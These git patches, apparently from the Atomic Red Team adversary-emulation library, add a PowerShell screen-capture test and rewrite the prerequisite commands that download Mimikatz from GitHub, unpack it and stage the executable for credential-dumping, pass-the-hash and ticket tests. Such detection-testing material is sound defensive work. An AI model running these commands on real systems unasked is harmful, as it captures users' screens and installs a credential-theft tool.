 privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 0b8ffec9..f02535b2 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -208,6 +208,7 @@
   - Atomic Test #3: X Windows Capture [linux]
   - Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
   - Atomic Test #5: Windows Screencapture [windows]
+  - Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index b4e18773..2a6a9911 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -153,6 +153,7 @@
 - T1114.002 Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1113 Screen Capture](../../T1113/T1113.md)
   - Atomic Test #5: Windows Screencapture [windows]
+  - Atomic Test #6: Windows Screen Capture (CopyFromScreen) [windows]
 - T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1125 Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 4e12228a..eb30fb86 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -9132,6 +9132,31 @@ collection:
         cleanup_command: 'rm #{output_file} -ErrorAction Ignore
 
 '
+    - name: Windows Screen Capture (CopyFromScreen)
+      auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187
+      description: |
+        Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
+
+        [Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
+      supported_platforms:
+      - windows
+      input_arguments:
+        output_file:
+          description: Path where captured results will be placed
+          type: Path
+          default: "$env:TEMP\\T1113.png"
+      executor:
+        command: |
+          Add-Type -AssemblyName System.Windows.Forms
+          $screen = [Windows.Forms.SystemInformation]::VirtualScreen
+          $bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
+          $graphic = [Drawing.Graphics]::FromImage($bitmap)
+          $graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
+          $bitmap.Save("#{output_file}")
+        cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore
+
+'
+        name: powershell
   T1213.002:
     technique:
       external_references:
diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md
index fc466d2d..873bb64f 100644
--- a/atomics/T1113/T1113.md
+++ b/atomics/T1113/T1113.md
@@ -15,6 +15,8 @@
 
 - [Atomic Test #5 - Windows Screencapture](#atomic-test-5---windows-screencapture)
 
+- [Atomic Test #6 - Windows Screen Capture (CopyFromScreen)](#atomic-test-6---windows-screen-capture-copyfromscreen)
+
 
 <br/>
 
@@ -231,4 +233,48 @@ rm #{output_file} -ErrorAction Ignore
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - Windows Screen Capture (CopyFromScreen)
+Take a screen capture of the desktop through a call to the [Graphics.CopyFromScreen] .NET API.
+
+[Graphics.CopyFromScreen]: https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e9313014-985a-48ef-80d9-cde604ffc187
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed | Path | $env:TEMP&#92;T1113.png|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Add-Type -AssemblyName System.Windows.Forms
+$screen = [Windows.Forms.SystemInformation]::VirtualScreen
+$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height
+$graphic = [Drawing.Graphics]::FromImage($bitmap)
+$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
+$bitmap.Save("#{output_file}")
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item #{output_file} -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

From 50e36cb7e72db6f6e522e4bd7c299b91aa05564a Mon Sep 17 00:00:00 2001
From: Arioch <16936254+ZeArioch@users.noreply.github.com>
Date: Mon, 23 Aug 2021 23:08:54 +0200
Subject: [PATCH 38/39] Update hardcoded Mimikatz releases download URLs
 (#1604)

* update references to hardcoded mimikatz releases

* update invoke-webreauest parameters

* apply -UseBasicParsing consistently to Invoke-WebRequest calls

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1003.001/T1003.001.yaml | 11 ++---------
 atomics/T1003.006/T1003.006.yaml |  3 ++-
 atomics/T1055/T1055.yaml         |  4 ++--
 atomics/T1207/T1207.yaml         |  3 ++-
 atomics/T1550.002/T1550.002.yaml |  3 ++-
 atomics/T1550.003/T1550.003.yaml |  3 ++-
 atomics/T1558.001/T1558.001.yaml |  3 ++-
 7 files changed, 14 insertions(+), 16 deletions(-)

diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 95a7a2f6..b3de5492 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -187,15 +187,8 @@ atomic_tests:
       if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
-      $request = [System.Net.WebRequest]::Create($url)
-      $response = $request.GetResponse()
-      $realTagUrl = $response.ResponseUri.OriginalString
-      $version = $realTagUrl.split('/')[-1]
-      $fileName = 'mimikatz_trunk.zip'
-      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
-      Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
       Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
       New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
       Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1003.006/T1003.006.yaml b/atomics/T1003.006/T1003.006.yaml
index dd51330f..172d1834 100644
--- a/atomics/T1003.006/T1003.006.yaml
+++ b/atomics/T1003.006/T1003.006.yaml
@@ -32,7 +32,8 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml
index e6ecea77..03615920 100644
--- a/atomics/T1055/T1055.yaml
+++ b/atomics/T1055/T1055.yaml
@@ -63,8 +63,8 @@ atomic_tests:
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
-      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1207/T1207.yaml b/atomics/T1207/T1207.yaml
index 7f38b3be..4e7df9db 100644
--- a/atomics/T1207/T1207.yaml
+++ b/atomics/T1207/T1207.yaml
@@ -46,7 +46,8 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1550.002/T1550.002.yaml b/atomics/T1550.002/T1550.002.yaml
index 416e222d..2fc50b21 100644
--- a/atomics/T1550.002/T1550.002.yaml
+++ b/atomics/T1550.002/T1550.002.yaml
@@ -34,7 +34,8 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1550.003/T1550.003.yaml b/atomics/T1550.003/T1550.003.yaml
index e3539161..4953be47 100644
--- a/atomics/T1550.003/T1550.003.yaml
+++ b/atomics/T1550.003/T1550.003.yaml
@@ -28,7 +28,8 @@ atomic_tests:
       if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
       Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
       New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
       Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1558.001/T1558.001.yaml b/atomics/T1558.001/T1558.001.yaml
index 883b1fd4..cf55d773 100644
--- a/atomics/T1558.001/T1558.001.yaml
+++ b/atomics/T1558.001/T1558.001.yaml
@@ -39,7 +39,8 @@ atomic_tests:
       if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
     get_prereq_command: |
       $mimikatz_path = cmd /c echo #{mimikatz_path}
-      Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+      $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+      Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
       Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
       New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
       Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force

From b10fa043d195e7682d9fbce24566630e2575e784 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator <email>
Date: Mon, 23 Aug 2021 21:09:34 +0000
Subject: [PATCH 39/39] Generate docs from
 job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 atomics/Indexes/index.yaml     | 40 +++++++++++++++++-----------------
 atomics/T1003.001/T1003.001.md | 11 ++--------
 atomics/T1003.006/T1003.006.md |  3 ++-
 atomics/T1055/T1055.md         |  4 ++--
 atomics/T1207/T1207.md         |  3 ++-
 atomics/T1550.002/T1550.002.md |  3 ++-
 atomics/T1550.003/T1550.003.md |  3 ++-
 atomics/T1558.001/T1558.001.md |  3 ++-
 8 files changed, 34 insertions(+), 36 deletions(-)

diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index eb30fb86..93d419bd 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -1584,7 +1584,8 @@ credential-access:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -2071,7 +2072,8 @@ credential-access:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -3149,15 +3151,8 @@ credential-access:
 '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          $url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
-          $request = [System.Net.WebRequest]::Create($url)
-          $response = $request.GetResponse()
-          $realTagUrl = $response.ResponseUri.OriginalString
-          $version = $realTagUrl.split('/')[-1]
-          $fileName = 'mimikatz_trunk.zip'
-          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          $realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
-          Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
           Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
           New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
           Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
@@ -15926,8 +15921,8 @@ privilege-escalation:
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
-          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -30812,7 +30807,8 @@ defense-evasion:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -30971,7 +30967,8 @@ defense-evasion:
 '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
           Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
           New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
           Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
@@ -32102,8 +32099,8 @@ defense-evasion:
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
-          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -33293,7 +33290,8 @@ defense-evasion:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -63421,7 +63419,8 @@ lateral-movement:
           if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
         get_prereq_command: |
           $mimikatz_path = cmd /c echo #{mimikatz_path}
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20210724/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
           Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
           New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
           Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
@@ -63580,7 +63579,8 @@ lateral-movement:
 '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-          Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
+          $mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+          Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
           Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
           New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
           Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1003.001/T1003.001.md b/atomics/T1003.001/T1003.001.md
index 024dd2aa..48a2cc91 100644
--- a/atomics/T1003.001/T1003.001.md
+++ b/atomics/T1003.001/T1003.001.md
@@ -340,15 +340,8 @@ if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-$url = 'https://github.com/gentilkiwi/mimikatz/releases/latest'
-$request = [System.Net.WebRequest]::Create($url)
-$response = $request.GetResponse()
-$realTagUrl = $response.ResponseUri.OriginalString
-$version = $realTagUrl.split('/')[-1]
-$fileName = 'mimikatz_trunk.zip'
-[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-$realDownloadUrl =$realTagUrl.Replace('tag','download') + '/' + $fileName
-Invoke-WebRequest $realDownloadUrl -OutFile "$env:TEMP\Mimi.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\Mimi.zip"
 Expand-Archive $env:TEMP\Mimi.zip $env:TEMP\Mimi -Force
 New-Item -ItemType Directory (Split-Path #{mimikatz_exe}) -Force | Out-Null
 Copy-Item $env:TEMP\Mimi\x64\mimikatz.exe #{mimikatz_exe} -Force
diff --git a/atomics/T1003.006/T1003.006.md b/atomics/T1003.006/T1003.006.md
index 8a949602..804393a0 100644
--- a/atomics/T1003.006/T1003.006.md
+++ b/atomics/T1003.006/T1003.006.md
@@ -56,7 +56,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
-Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
 Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
 New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
 Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 89bdde81..fd7e0d82 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -111,8 +111,8 @@ if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
 ```powershell
 $mimikatz_path = cmd /c echo #{mimikatz_path}
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
-Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -OutFile "$env:TEMP\mimikatz.zip"
+$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
+Invoke-WebRequest "https://github.com$mimikatz_relative_uri" -UseBasicParsing -OutFile "$env:TEMP\mimikatz.zip"
